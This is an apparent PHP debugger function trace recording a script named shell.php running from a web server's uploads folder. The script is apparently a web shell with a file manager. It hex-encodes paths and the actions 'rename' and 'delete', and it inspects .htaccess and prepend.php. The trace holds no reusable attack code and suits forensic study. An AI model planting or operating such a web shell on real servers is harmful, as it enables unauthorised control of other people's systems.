3 682 0 0.024664 484560 dechex 0 /var/www/html/uploads/shell.php 19 1 97
3 682 1 0.024675 484632
3 682 R '61'
2 A /var/www/html/uploads/shell.php 19 $r .= '61'
2 A /var/www/html/uploads/shell.php 18 $i++
3 683 0 0.024704 484560 ord 0 /var/www/html/uploads/shell.php 19 1 'r'
3 683 1 0.024716 484600
3 683 R 114
3 684 0 0.024728 484560 dechex 0 /var/www/html/uploads/shell.php 19 1 114
3 684 1 0.024739 484632
3 684 R '72'
2 A /var/www/html/uploads/shell.php 19 $r .= '72'
2 A /var/www/html/uploads/shell.php 18 $i++
3 685 0 0.024768 484568 ord 0 /var/www/html/uploads/shell.php 19 1 '/'
3 685 1 0.024779 484608
3 685 R 47
3 686 0 0.024791 484568 dechex 0 /var/www/html/uploads/shell.php 19 1 47
3 686 1 0.024803 484640
3 686 R '2f'
2 A /var/www/html/uploads/shell.php 19 $r .= '2f'
2 A /var/www/html/uploads/shell.php 18 $i++
3 687 0 0.024831 484568 ord 0 /var/www/html/uploads/shell.php 19 1 'w'
3 687 1 0.024843 484608
3 687 R 119
3 688 0 0.024855 484568 dechex 0 /var/www/html/uploads/shell.php 19 1 119
3 688 1 0.024866 484640
3 688 R '77'
2 A /var/www/html/uploads/shell.php 19 $r .= '77'
2 A /var/www/html/uploads/shell.php 18 $i++
3 689 0 0.024895 484568 ord 0 /var/www/html/uploads/shell.php 19 1 'w'
3 689 1 0.024906 484608
3 689 R 119
3 690 0 0.024918 484568 dechex 0 /var/www/html/uploads/shell.php 19 1 119
3 690 1 0.024929 484640
3 690 R '77'
2 A /var/www/html/uploads/shell.php 19 $r .= '77'
2 A /var/www/html/uploads/shell.php 18 $i++
3 691 0 0.024957 484568 ord 0 /var/www/html/uploads/shell.php 19 1 'w'
3 691 1 0.024969 484608
3 691 R 119
3 692 0 0.024980 484568 dechex 0 /var/www/html/uploads/shell.php 19 1 119
3 692 1 0.024991 484640
3 692 R '77'
2 A /var/www/html/uploads/shell.php 19 $r .= '77'
2 A /var/www/html/uploads/shell.php 18 $i++
3 693 0 0.025019 484576 ord 0 /var/www/html/uploads/shell.php 19 1 '/'
3 693 1 0.025031 484616
3 693 R 47
3 694 0 0.025043 484576 dechex 0 /var/www/html/uploads/shell.php 19 1 47
3 694 1 0.025054 484648
3 694 R '2f'
2 A /var/www/html/uploads/shell.php 19 $r .= '2f'
2 A /var/www/html/uploads/shell.php 18 $i++
3 695 0 0.025083 484576 ord 0 /var/www/html/uploads/shell.php 19 1 'h'
3 695 1 0.025094 484616
3 695 R 104
3 696 0 0.025106 484576 dechex 0 /var/www/html/uploads/shell.php 19 1 104
3 696 1 0.025117 484648
3 696 R '68'
2 A /var/www/html/uploads/shell.php 19 $r .= '68'
2 A /var/www/html/uploads/shell.php 18 $i++
3 697 0 0.025146 484576 ord 0 /var/www/html/uploads/shell.php 19 1 't'
3 697 1 0.025158 484616
3 697 R 116
3 698 0 0.025170 484576 dechex 0 /var/www/html/uploads/shell.php 19 1 116
3 698 1 0.025181 484648
3 698 R '74'
2 A /var/www/html/uploads/shell.php 19 $r .= '74'
2 A /var/www/html/uploads/shell.php 18 $i++
3 699 0 0.025209 484576 ord 0 /var/www/html/uploads/shell.php 19 1 'm'
3 699 1 0.025221 484616
3 699 R 109
3 700 0 0.025233 484576 dechex 0 /var/www/html/uploads/shell.php 19 1 109
3 700 1 0.025248 484648
3 700 R '6d'
2 A /var/www/html/uploads/shell.php 19 $r .= '6d'
2 A /var/www/html/uploads/shell.php 18 $i++
3 701 0 0.025280 484584 ord 0 /var/www/html/uploads/shell.php 19 1 'l'
3 701 1 0.025327 484624
3 701 R 108
3 702 0 0.025341 484584 dechex 0 /var/www/html/uploads/shell.php 19 1 108
3 702 1 0.025352 484656
3 702 R '6c'
2 A /var/www/html/uploads/shell.php 19 $r .= '6c'
2 A /var/www/html/uploads/shell.php 18 $i++
3 703 0 0.025382 484584 ord 0 /var/www/html/uploads/shell.php 19 1 '/'
3 703 1 0.025393 484624
3 703 R 47
3 704 0 0.025405 484584 dechex 0 /var/www/html/uploads/shell.php 19 1 47
3 704 1 0.025416 484656
3 704 R '2f'
2 A /var/www/html/uploads/shell.php 19 $r .= '2f'
2 A /var/www/html/uploads/shell.php 18 $i++
3 705 0 0.025445 484584 ord 0 /var/www/html/uploads/shell.php 19 1 'u'
3 705 1 0.025456 484624
3 705 R 117
3 706 0 0.025468 484584 dechex 0 /var/www/html/uploads/shell.php 19 1 117
3 706 1 0.025479 484656
3 706 R '75'
2 A /var/www/html/uploads/shell.php 19 $r .= '75'
2 A /var/www/html/uploads/shell.php 18 $i++
3 707 0 0.025507 484584 ord 0 /var/www/html/uploads/shell.php 19 1 'p'
3 707 1 0.025519 484624
3 707 R 112
3 708 0 0.025531 484584 dechex 0 /var/www/html/uploads/shell.php 19 1 112
3 708 1 0.025542 484656
3 708 R '70'
2 A /var/www/html/uploads/shell.php 19 $r .= '70'
2 A /var/www/html/uploads/shell.php 18 $i++
3 709 0 0.025570 484592 ord 0 /var/www/html/uploads/shell.php 19 1 'l'
3 709 1 0.025581 484632
3 709 R 108
3 710 0 0.025593 484592 dechex 0 /var/www/html/uploads/shell.php 19 1 108
3 710 1 0.025605 484664
3 710 R '6c'
2 A /var/www/html/uploads/shell.php 19 $r .= '6c'
2 A /var/www/html/uploads/shell.php 18 $i++
3 711 0 0.025633 484592 ord 0 /var/www/html/uploads/shell.php 19 1 'o'
3 711 1 0.025644 484632
3 711 R 111
3 712 0 0.025656 484592 dechex 0 /var/www/html/uploads/shell.php 19 1 111
3 712 1 0.025667 484664
3 712 R '6f'
2 A /var/www/html/uploads/shell.php 19 $r .= '6f'
2 A /var/www/html/uploads/shell.php 18 $i++
3 713 0 0.025696 484592 ord 0 /var/www/html/uploads/shell.php 19 1 'a'
3 713 1 0.025707 484632
3 713 R 97
3 714 0 0.025718 484592 dechex 0 /var/www/html/uploads/shell.php 19 1 97
3 714 1 0.025729 484664
3 714 R '61'
2 A /var/www/html/uploads/shell.php 19 $r .= '61'
2 A /var/www/html/uploads/shell.php 18 $i++
3 715 0 0.025758 484592 ord 0 /var/www/html/uploads/shell.php 19 1 'd'
3 715 1 0.025769 484632
3 715 R 100
3 716 0 0.025781 484592 dechex 0 /var/www/html/uploads/shell.php 19 1 100
3 716 1 0.025792 484664
3 716 R '64'
2 A /var/www/html/uploads/shell.php 19 $r .= '64'
2 A /var/www/html/uploads/shell.php 18 $i++
3 717 0 0.025821 484608 ord 0 /var/www/html/uploads/shell.php 19 1 's'
3 717 1 0.025832 484648
3 717 R 115
3 718 0 0.025844 484608 dechex 0 /var/www/html/uploads/shell.php 19 1 115
3 718 1 0.025855 484680
3 718 R '73'
2 A /var/www/html/uploads/shell.php 19 $r .= '73'
2 A /var/www/html/uploads/shell.php 18 $i++
2 676 1 0.025884 484608
2 676 R '2f7661722f7777772f68746d6c2f75706c6f616473'
2 719 0 0.025899 484592 hex 1 /var/www/html/uploads/shell.php 121 1 'rename'
2 A /var/www/html/uploads/shell.php 17 $r = ''
2 A /var/www/html/uploads/shell.php 18 $i = 0
3 720 0 0.025929 484592 ord 0 /var/www/html/uploads/shell.php 19 1 'r'
3 720 1 0.025940 484632
3 720 R 114
3 721 0 0.025953 484592 dechex 0 /var/www/html/uploads/shell.php 19 1 114
3 721 1 0.025964 484664
3 721 R '72'
2 A /var/www/html/uploads/shell.php 19 $r .= '72'
2 A /var/www/html/uploads/shell.php 18 $i++
3 722 0 0.025997 484624 ord 0 /var/www/html/uploads/shell.php 19 1 'e'
3 722 1 0.026009 484664
3 722 R 101
3 723 0 0.026021 484624 dechex 0 /var/www/html/uploads/shell.php 19 1 101
3 723 1 0.026032 484696
3 723 R '65'
2 A /var/www/html/uploads/shell.php 19 $r .= '65'
2 A /var/www/html/uploads/shell.php 18 $i++
3 724 0 0.026061 484624 ord 0 /var/www/html/uploads/shell.php 19 1 'n'
3 724 1 0.026072 484664
3 724 R 110
3 725 0 0.026084 484624 dechex 0 /var/www/html/uploads/shell.php 19 1 110
3 725 1 0.026095 484696
3 725 R '6e'
2 A /var/www/html/uploads/shell.php 19 $r .= '6e'
2 A /var/www/html/uploads/shell.php 18 $i++
3 726 0 0.026124 484624 ord 0 /var/www/html/uploads/shell.php 19 1 'a'
3 726 1 0.026134 484664
3 726 R 97
3 727 0 0.026147 484624 dechex 0 /var/www/html/uploads/shell.php 19 1 97
3 727 1 0.026158 484696
3 727 R '61'
2 A /var/www/html/uploads/shell.php 19 $r .= '61'
2 A /var/www/html/uploads/shell.php 18 $i++
3 728 0 0.026186 484632 ord 0 /var/www/html/uploads/shell.php 19 1 'm'
3 728 1 0.026197 484672
3 728 R 109
3 729 0 0.026209 484632 dechex 0 /var/www/html/uploads/shell.php 19 1 109
3 729 1 0.026220 484704
3 729 R '6d'
2 A /var/www/html/uploads/shell.php 19 $r .= '6d'
2 A /var/www/html/uploads/shell.php 18 $i++
3 730 0 0.026248 484632 ord 0 /var/www/html/uploads/shell.php 19 1 'e'
3 730 1 0.026260 484672
3 730 R 101
3 731 0 0.026271 484632 dechex 0 /var/www/html/uploads/shell.php 19 1 101
3 731 1 0.026282 484704
3 731 R '65'
2 A /var/www/html/uploads/shell.php 19 $r .= '65'
2 A /var/www/html/uploads/shell.php 18 $i++
2 719 1 0.026311 484632
2 719 R '72656e616d65'
2 732 0 0.026324 484592 hex 1 /var/www/html/uploads/shell.php 121 1 'data'
2 A /var/www/html/uploads/shell.php 17 $r = ''
2 A /var/www/html/uploads/shell.php 18 $i = 0
3 733 0 0.026354 484592 ord 0 /var/www/html/uploads/shell.php 19 1 'd'
3 733 1 0.026365 484632
3 733 R 100
3 734 0 0.026377 484592 dechex 0 /var/www/html/uploads/shell.php 19 1 100
3 734 1 0.026388 484664
3 734 R '64'
2 A /var/www/html/uploads/shell.php 19 $r .= '64'
2 A /var/www/html/uploads/shell.php 18 $i++
3 735 0 0.026417 484624 ord 0 /var/www/html/uploads/shell.php 19 1 'a'
3 735 1 0.026428 484664
3 735 R 97
3 736 0 0.026441 484624 dechex 0 /var/www/html/uploads/shell.php 19 1 97
3 736 1 0.026452 484696
3 736 R '61'
2 A /var/www/html/uploads/shell.php 19 $r .= '61'
2 A /var/www/html/uploads/shell.php 18 $i++
3 737 0 0.026481 484624 ord 0 /var/www/html/uploads/shell.php 19 1 't'
3 737 1 0.026492 484664
3 737 R 116
3 738 0 0.026504 484624 dechex 0 /var/www/html/uploads/shell.php 19 1 116
3 738 1 0.026515 484696
3 738 R '74'
2 A /var/www/html/uploads/shell.php 19 $r .= '74'
2 A /var/www/html/uploads/shell.php 18 $i++
3 739 0 0.026543 484624 ord 0 /var/www/html/uploads/shell.php 19 1 'a'
3 739 1 0.026554 484664
3 739 R 97
3 740 0 0.026566 484624 dechex 0 /var/www/html/uploads/shell.php 19 1 97
3 740 1 0.026578 484696
3 740 R '61'
2 A /var/www/html/uploads/shell.php 19 $r .= '61'
2 A /var/www/html/uploads/shell.php 18 $i++
2 732 1 0.026607 484632
2 732 R '64617461'
2 741 0 0.026620 484720 hex 1 /var/www/html/uploads/shell.php 121 1 '/var/www/html/uploads'
2 A /var/www/html/uploads/shell.php 17 $r = ''
2 A /var/www/html/uploads/shell.php 18 $i = 0
3 742 0 0.026650 484720 ord 0 /var/www/html/uploads/shell.php 19 1 '/'
3 742 1 0.026661 484760
3 742 R 47
3 743 0 0.026673 484720 dechex 0 /var/www/html/uploads/shell.php 19 1 47
3 743 1 0.026684 484792
3 743 R '2f'
2 A /var/www/html/uploads/shell.php 19 $r .= '2f'
2 A /var/www/html/uploads/shell.php 18 $i++
3 744 0 0.026716 484752 ord 0 /var/www/html/uploads/shell.php 19 1 'v'
3 744 1 0.026727 484792
3 744 R 118
3 745 0 0.026739 484752 dechex 0 /var/www/html/uploads/shell.php 19 1 118
3 745 1 0.026751 484824
3 745 R '76'
2 A /var/www/html/uploads/shell.php 19 $r .= '76'
2 A /var/www/html/uploads/shell.php 18 $i++
3 746 0 0.026780 484752 ord 0 /var/www/html/uploads/shell.php 19 1 'a'
3 746 1 0.026791 484792
3 746 R 97
3 747 0 0.026803 484752 dechex 0 /var/www/html/uploads/shell.php 19 1 97
3 747 1 0.026814 484824
3 747 R '61'
2 A /var/www/html/uploads/shell.php 19 $r .= '61'
2 A /var/www/html/uploads/shell.php 18 $i++
3 748 0 0.026843 484752 ord 0 /var/www/html/uploads/shell.php 19 1 'r'
3 748 1 0.026854 484792
3 748 R 114
3 749 0 0.026866 484752 dechex 0 /var/www/html/uploads/shell.php 19 1 114
3 749 1 0.026877 484824
3 749 R '72'
2 A /var/www/html/uploads/shell.php 19 $r .= '72'
2 A /var/www/html/uploads/shell.php 18 $i++
3 750 0 0.026905 484760 ord 0 /var/www/html/uploads/shell.php 19 1 '/'
3 750 1 0.026917 484800
3 750 R 47
3 751 0 0.026929 484760 dechex 0 /var/www/html/uploads/shell.php 19 1 47
3 751 1 0.026940 484832
3 751 R '2f'
2 A /var/www/html/uploads/shell.php 19 $r .= '2f'
2 A /var/www/html/uploads/shell.php 18 $i++
3 752 0 0.026969 484760 ord 0 /var/www/html/uploads/shell.php 19 1 'w'
3 752 1 0.026980 484800
3 752 R 119
3 753 0 0.026992 484760 dechex 0 /var/www/html/uploads/shell.php 19 1 119
3 753 1 0.027003 484832
3 753 R '77'
2 A /var/www/html/uploads/shell.php 19 $r .= '77'
2 A /var/www/html/uploads/shell.php 18 $i++
3 754 0 0.027031 484760 ord 0 /var/www/html/uploads/shell.php 19 1 'w'
3 754 1 0.027043 484800
3 754 R 119
3 755 0 0.027055 484760 dechex 0 /var/www/html/uploads/shell.php 19 1 119
3 755 1 0.027066 484832
3 755 R '77'
2 A /var/www/html/uploads/shell.php 19 $r .= '77'
2 A /var/www/html/uploads/shell.php 18 $i++
3 756 0 0.027095 484760 ord 0 /var/www/html/uploads/shell.php 19 1 'w'
3 756 1 0.027106 484800
3 756 R 119
3 757 0 0.027118 484760 dechex 0 /var/www/html/uploads/shell.php 19 1 119
3 757 1 0.027129 484832
3 757 R '77'
2 A /var/www/html/uploads/shell.php 19 $r .= '77'
2 A /var/www/html/uploads/shell.php 18 $i++
3 758 0 0.027157 484768 ord 0 /var/www/html/uploads/shell.php 19 1 '/'
3 758 1 0.027169 484808
3 758 R 47
3 759 0 0.027181 484768 dechex 0 /var/www/html/uploads/shell.php 19 1 47
3 759 1 0.027192 484840
3 759 R '2f'
2 A /var/www/html/uploads/shell.php 19 $r .= '2f'
2 A /var/www/html/uploads/shell.php 18 $i++
3 760 0 0.027222 484768 ord 0 /var/www/html/uploads/shell.php 19 1 'h'
3 760 1 0.027233 484808
3 760 R 104
3 761 0 0.027252 484768 dechex 0 /var/www/html/uploads/shell.php 19 1 104
3 761 1 0.027263 484840
3 761 R '68'
2 A /var/www/html/uploads/shell.php 19 $r .= '68'
2 A /var/www/html/uploads/shell.php 18 $i++
3 762 0 0.027292 484768 ord 0 /var/www/html/uploads/shell.php 19 1 't'
3 762 1 0.027304 484808
3 762 R 116
3 763 0 0.027315 484768 dechex 0 /var/www/html/uploads/shell.php 19 1 116
3 763 1 0.027326 484840
3 763 R '74'
2 A /var/www/html/uploads/shell.php 19 $r .= '74'
2 A /var/www/html/uploads/shell.php 18 $i++
3 764 0 0.027355 484768 ord 0 /var/www/html/uploads/shell.php 19 1 'm'
3 764 1 0.027366 484808
3 764 R 109
3 765 0 0.027378 484768 dechex 0 /var/www/html/uploads/shell.php 19 1 109
3 765 1 0.027389 484840
3 765 R '6d'
2 A /var/www/html/uploads/shell.php 19 $r .= '6d'
2 A /var/www/html/uploads/shell.php 18 $i++
3 766 0 0.027419 484776 ord 0 /var/www/html/uploads/shell.php 19 1 'l'
3 766 1 0.027434 484816
3 766 R 108
3 767 0 0.027446 484776 dechex 0 /var/www/html/uploads/shell.php 19 1 108
3 767 1 0.027458 484848
3 767 R '6c'
2 A /var/www/html/uploads/shell.php 19 $r .= '6c'
2 A /var/www/html/uploads/shell.php 18 $i++
3 768 0 0.027526 484776 ord 0 /var/www/html/uploads/shell.php 19 1 '/'
3 768 1 0.027538 484816
3 768 R 47
3 769 0 0.027551 484776 dechex 0 /var/www/html/uploads/shell.php 19 1 47
3 769 1 0.027562 484848
3 769 R '2f'
2 A /var/www/html/uploads/shell.php 19 $r .= '2f'
2 A /var/www/html/uploads/shell.php 18 $i++
3 770 0 0.027592 484776 ord 0 /var/www/html/uploads/shell.php 19 1 'u'
3 770 1 0.027603 484816
3 770 R 117
3 771 0 0.027615 484776 dechex 0 /var/www/html/uploads/shell.php 19 1 117
3 771 1 0.027626 484848
3 771 R '75'
2 A /var/www/html/uploads/shell.php 19 $r .= '75'
2 A /var/www/html/uploads/shell.php 18 $i++
3 772 0 0.027655 484776 ord 0 /var/www/html/uploads/shell.php 19 1 'p'
3 772 1 0.027666 484816
3 772 R 112
3 773 0 0.027678 484776 dechex 0 /var/www/html/uploads/shell.php 19 1 112
3 773 1 0.027689 484848
3 773 R '70'
2 A /var/www/html/uploads/shell.php 19 $r .= '70'
2 A /var/www/html/uploads/shell.php 18 $i++
3 774 0 0.027718 484784 ord 0 /var/www/html/uploads/shell.php 19 1 'l'
3 774 1 0.027729 484824
3 774 R 108
3 775 0 0.027741 484784 dechex 0 /var/www/html/uploads/shell.php 19 1 108
3 775 1 0.027752 484856
3 775 R '6c'
2 A /var/www/html/uploads/shell.php 19 $r .= '6c'
2 A /var/www/html/uploads/shell.php 18 $i++
3 776 0 0.027781 484784 ord 0 /var/www/html/uploads/shell.php 19 1 'o'
3 776 1 0.027792 484824
3 776 R 111
3 777 0 0.027804 484784 dechex 0 /var/www/html/uploads/shell.php 19 1 111
3 777 1 0.027815 484856
3 777 R '6f'
2 A /var/www/html/uploads/shell.php 19 $r .= '6f'
2 A /var/www/html/uploads/shell.php 18 $i++
3 778 0 0.027844 484784 ord 0 /var/www/html/uploads/shell.php 19 1 'a'
3 778 1 0.027855 484824
3 778 R 97
3 779 0 0.027867 484784 dechex 0 /var/www/html/uploads/shell.php 19 1 97
3 779 1 0.027878 484856
3 779 R '61'
2 A /var/www/html/uploads/shell.php 19 $r .= '61'
2 A /var/www/html/uploads/shell.php 18 $i++
3 780 0 0.027907 484784 ord 0 /var/www/html/uploads/shell.php 19 1 'd'
3 780 1 0.027919 484824
3 780 R 100
3 781 0 0.027931 484784 dechex 0 /var/www/html/uploads/shell.php 19 1 100
3 781 1 0.027942 484856
3 781 R '64'
2 A /var/www/html/uploads/shell.php 19 $r .= '64'
2 A /var/www/html/uploads/shell.php 18 $i++
3 782 0 0.027971 484800 ord 0 /var/www/html/uploads/shell.php 19 1 's'
3 782 1 0.027982 484840
3 782 R 115
3 783 0 0.027994 484800 dechex 0 /var/www/html/uploads/shell.php 19 1 115
3 783 1 0.028005 484872
3 783 R '73'
2 A /var/www/html/uploads/shell.php 19 $r .= '73'
2 A /var/www/html/uploads/shell.php 18 $i++
2 741 1 0.028034 484800
2 741 R '2f7661722f7777772f68746d6c2f75706c6f616473'
2 784 0 0.028050 484848 hex 1 /var/www/html/uploads/shell.php 121 1 'delete'
2 A /var/www/html/uploads/shell.php 17 $r = ''
2 A /var/www/html/uploads/shell.php 18 $i = 0
3 785 0 0.028081 484848 ord 0 /var/www/html/uploads/shell.php 19 1 'd'
3 785 1 0.028092 484888
3 785 R 100
3 786 0 0.028104 484848 dechex 0 /var/www/html/uploads/shell.php 19 1 100
3 786 1 0.028116 484920
3 786 R '64'
2 A /var/www/html/uploads/shell.php 19 $r .= '64'
2 A /var/www/html/uploads/shell.php 18 $i++
3 787 0 0.028145 484880 ord 0 /var/www/html/uploads/shell.php 19 1 'e'
3 787 1 0.028156 484920
3 787 R 101
3 788 0 0.028168 484880 dechex 0 /var/www/html/uploads/shell.php 19 1 101
3 788 1 0.028180 484952
3 788 R '65'
2 A /var/www/html/uploads/shell.php 19 $r .= '65'
2 A /var/www/html/uploads/shell.php 18 $i++
3 789 0 0.028214 484880 ord 0 /var/www/html/uploads/shell.php 19 1 'l'
3 789 1 0.028225 484920
3 789 R 108
3 790 0 0.028238 484880 dechex 0 /var/www/html/uploads/shell.php 19 1 108
3 790 1 0.028249 484952
3 790 R '6c'
2 A /var/www/html/uploads/shell.php 19 $r .= '6c'
2 A /var/www/html/uploads/shell.php 18 $i++
3 791 0 0.028278 484880 ord 0 /var/www/html/uploads/shell.php 19 1 'e'
3 791 1 0.028289 484920
3 791 R 101
3 792 0 0.028301 484880 dechex 0 /var/www/html/uploads/shell.php 19 1 101
3 792 1 0.028312 484952
3 792 R '65'
2 A /var/www/html/uploads/shell.php 19 $r .= '65'
2 A /var/www/html/uploads/shell.php 18 $i++
3 793 0 0.028341 484888 ord 0 /var/www/html/uploads/shell.php 19 1 't'
3 793 1 0.028352 484928
3 793 R 116
3 794 0 0.028364 484888 dechex 0 /var/www/html/uploads/shell.php 19 1 116
3 794 1 0.028375 484960
3 794 R '74'
2 A /var/www/html/uploads/shell.php 19 $r .= '74'
2 A /var/www/html/uploads/shell.php 18 $i++
3 795 0 0.028404 484888 ord 0 /var/www/html/uploads/shell.php 19 1 'e'
3 795 1 0.028415 484928
3 795 R 101
3 796 0 0.028427 484888 dechex 0 /var/www/html/uploads/shell.php 19 1 101
3 796 1 0.028439 484960
3 796 R '65'
2 A /var/www/html/uploads/shell.php 19 $r .= '65'
2 A /var/www/html/uploads/shell.php 18 $i++
2 784 1 0.028467 484888
2 784 R '64656c657465'
2 797 0 0.028481 484848 hex 1 /var/www/html/uploads/shell.php 121 1 'data'
2 A /var/www/html/uploads/shell.php 17 $r = ''
2 A /var/www/html/uploads/shell.php 18 $i = 0
3 798 0 0.028511 484848 ord 0 /var/www/html/uploads/shell.php 19 1 'd'
3 798 1 0.028522 484888
3 798 R 100
3 799 0 0.028534 484848 dechex 0 /var/www/html/uploads/shell.php 19 1 100
3 799 1 0.028546 484920
3 799 R '64'
2 A /var/www/html/uploads/shell.php 19 $r .= '64'
2 A /var/www/html/uploads/shell.php 18 $i++
3 800 0 0.028574 484880 ord 0 /var/www/html/uploads/shell.php 19 1 'a'
3 800 1 0.028586 484920
3 800 R 97
3 801 0 0.028598 484880 dechex 0 /var/www/html/uploads/shell.php 19 1 97
3 801 1 0.028609 484952
3 801 R '61'
2 A /var/www/html/uploads/shell.php 19 $r .= '61'
2 A /var/www/html/uploads/shell.php 18 $i++
3 802 0 0.028638 484880 ord 0 /var/www/html/uploads/shell.php 19 1 't'
3 802 1 0.028650 484920
3 802 R 116
3 803 0 0.028662 484880 dechex 0 /var/www/html/uploads/shell.php 19 1 116
3 803 1 0.028673 484952
3 803 R '74'
2 A /var/www/html/uploads/shell.php 19 $r .= '74'
2 A /var/www/html/uploads/shell.php 18 $i++
3 804 0 0.028744 484880 ord 0 /var/www/html/uploads/shell.php 19 1 'a'
3 804 1 0.028756 484920
3 804 R 97
3 805 0 0.028768 484880 dechex 0 /var/www/html/uploads/shell.php 19 1 97
3 805 1 0.028779 484952
3 805 R '61'
2 A /var/www/html/uploads/shell.php 19 $r .= '61'
2 A /var/www/html/uploads/shell.php 18 $i++
2 797 1 0.028808 484888
2 797 R '64617461'
2 806 0 0.028825 484272 is_dir 0 /var/www/html/uploads/shell.php 120 1 '/var/www/html/uploads/prepend.php'
2 806 1 0.028848 484320
2 806 R FALSE
2 807 0 0.028862 484272 is_dir 0 /var/www/html/uploads/shell.php 120 1 '/var/www/html/uploads/shell.php'
2 807 1 0.028877 484304
2 807 R FALSE
2 808 0 0.028891 484264 is_file 0 /var/www/html/uploads/shell.php 124 1 '/var/www/html/uploads/.htaccess'
2 808 1 0.028906 484304
2 808 R TRUE
2 809 0 0.028920 484264 filesize 0 /var/www/html/uploads/shell.php 125 1 '/var/www/html/uploads/.htaccess'
2 809 1 0.028933 484304
2 809 R 64
1 A /var/www/html/uploads/shell.php 125 $sz = 0.0625
2 810 0 0.028959 484208 round 0 /var/www/html/uploads/shell.php 126 2 0.0625 3
2 810 1 0.028973 484280
2 810 R 0.063
1 A /var/www/html/uploads/shell.php 126 $sz = 0.063
1 A /var/www/html/uploads/shell.php 127 $sz = '0.063KB'
2 811 0 0.029016 484240 hex 1 /var/www/html/uploads/shell.php 128 1 '/var/www/html/uploads'
2 A /var/www/html/uploads/shell.php 17 $r = ''
2 A /var/www/html/uploads/shell.php 18 $i = 0
3 812 0 0.029048 484240 ord 0 /var/www/html/uploads/shell.php 19 1 '/'
3 812 1 0.029059 484280
3 812 R 47
3 813 0 0.029071 484240 dechex 0 /var/www/html/uploads/shell.php 19 1 47
3 813 1 0.029083 484312
3 813 R '2f'
2 A /var/www/html/uploads/shell.php 19 $r .= '2f'
2 A /var/www/html/uploads/shell.php 18 $i++
3 814 0 0.029113 484272 ord 0 /var/www/html/uploads/shell.php 19 1 'v'
3 814 1 0.029125 484312
3 814 R 118
3 815 0 0.029137 484272 dechex 0 /var/www/html/uploads/shell.php 19 1 118
3 815 1 0.029148 484344
3 815 R '76'
2 A /var/www/html/uploads/shell.php 19 $r .= '76'
2 A /var/www/html/uploads/shell.php 18 $i++
3 816 0 0.029179 484272 ord 0 /var/www/html/uploads/shell.php 19 1 'a'
3 816 1 0.029210 484312
3 816 R 97
3 817 0 0.029223 484272 dechex 0 /var/www/html/uploads/shell.php 19 1 97
3 817 1 0.029235 484344
3 817 R '61'
2 A /var/www/html/uploads/shell.php 19 $r .= '61'
2 A /var/www/html/uploads/shell.php 18 $i++
3 818 0 0.029310 484272 ord 0 /var/www/html/uploads/shell.php 19 1 'r'
3 818 1 0.029323 484312
3 818 R 114
3 819 0 0.029335 484272 dechex 0 /var/www/html/uploads/shell.php 19 1 114
3 819 1 0.029347 484344
3 819 R '72'
2 A /var/www/html/uploads/shell.php 19 $r .= '72'
2 A /var/www/html/uploads/shell.php 18 $i++
3 820 0 0.029377 484280 ord 0 /var/www/html/uploads/shell.php 19 1 '/'
3 820 1 0.029388 484320
3 820 R 47
3 821 0 0.029400 484280 dechex 0 /var/www/html/uploads/shell.php 19 1 47
3 821 1 0.029411 484352
3 821 R '2f'
2 A /var/www/html/uploads/shell.php 19 $r .= '2f'
2 A /var/www/html/uploads/shell.php 18 $i++
3 822 0 0.029439 484280 ord 0 /var/www/html/uploads/shell.php 19 1 'w'
3 822 1 0.029450 484320
3 822 R 119
3 823 0 0.029462 484280 dechex 0 /var/www/html/uploads/shell.php 19 1 119
3 823 1 0.029473 484352
3 823 R '77'
2 A /var/www/html/uploads/shell.php 19 $r .= '77'
2 A /var/www/html/uploads/shell.php 18 $i++
3 824 0 0.029502 484280 ord 0 /var/www/html/uploads/shell.php 19 1 'w'
3 824 1 0.029513 484320
3 824 R 119
3 825 0 0.029524 484280 dechex 0 /var/www/html/uploads/shell.php 19 1 119
3 825 1 0.029535 484352
3 825 R '77'
2 A /var/www/html/uploads/shell.php 19 $r .= '77'
2 A /var/www/html/uploads/shell.php 18 $i++
3 826 0 0.029563 484280 ord 0 /var/www/html/uploads/shell.php 19 1 'w'
3 826 1 0.029575 484320
3 826 R 119
3 827 0 0.029587 484280 dechex 0 /var/www/html/uploads/shell.php 19 1 119
3 827 1 0.029598 484352
3 827 R '77'
2 A /var/www/html/uploads/shell.php 19 $r .= '77'
2 A /var/www/html/uploads/shell.php 18 $i++
3 828 0 0.029626 484288 ord 0 /var/www/html/uploads/shell.php 19 1 '/'
3 828 1 0.029637 484328
3 828 R 47
3 829 0 0.029649 484288 dechex 0 /var/www/html/uploads/shell.php 19 1 47
3 829 1 0.029660 484360
3 829 R '2f'
2 A /var/www/html/uploads/shell.php 19 $r .= '2f'
2 A /var/www/html/uploads/shell.php 18 $i++
3 830 0 0.029689 484288 ord 0 /var/www/html/uploads/shell.php 19 1 'h'
3 830 1 0.029701 484328
3 830 R 104
3 831 0 0.029712 484288 dechex 0 /var/www/html/uploads/shell.php 19 1 104
3 831 1 0.029726 484360
3 831 R '68'
2 A /var/www/html/uploads/shell.php 19 $r .= '68'
2 A /var/www/html/uploads/shell.php 18 $i++
3 832 0 0.029755 484288 ord 0 /var/www/html/uploads/shell.php 19 1 't'
3 832 1 0.029766 484328
3 832 R 116
3 833 0 0.029778 484288 dechex 0 /var/www/html/uploads/shell.php 19 1 116
3 833 1 0.029793 484360
3 833 R '74'
2 A /var/www/html/uploads/shell.php 19 $r .= '74'
2 A /var/www/html/uploads/shell.php 18 $i++
3 834 0 0.029823 484288 ord 0 /var/www/html/uploads/shell.php 19 1 'm'
3 834 1 0.029834 484328
3 834 R 109
3 835 0 0.029847 484288 dechex 0 /var/www/html/uploads/shell.php 19 1 109
3 835 1 0.029858 484360
3 835 R '6d'
2 A /var/www/html/uploads/shell.php 19 $r .= '6d'
2 A /var/www/html/uploads/shell.php 18 $i++
3 836 0 0.029887 484296 ord 0 /var/www/html/uploads/shell.php 19 1 'l'
3 836 1 0.029898 484336
3 836 R 108
3 837 0 0.029910 484296 dechex 0 /var/www/html/uploads/shell.php 19 1 108
3 837 1 0.029921 484368
3 837 R '6c'
2 A /var/www/html/uploads/shell.php 19 $r .= '6c'
2 A /var/www/html/uploads/shell.php 18 $i++
3 838 0 0.029950 484296 ord 0 /var/www/html/uploads/shell.php 19 1 '/'
3 838 1 0.029961 484336
3 838 R 47
3 839 0 0.029973 484296 dechex 0 /var/www/html/uploads/shell.php 19 1 47
3 839 1 0.029984 484368
3 839 R '2f'
2 A /var/www/html/uploads/shell.php 19 $r .= '2f'
2 A /var/www/html/uploads/shell.php 18 $i++
3 840 0 0.030012 484296 ord 0 /var/www/html/uploads/shell.php 19 1 'u'
3 840 1 0.030024 484336
3 840 R 117
3 841 0 0.030036 484296 dechex 0 /var/www/html/uploads/shell.php 19 1 117
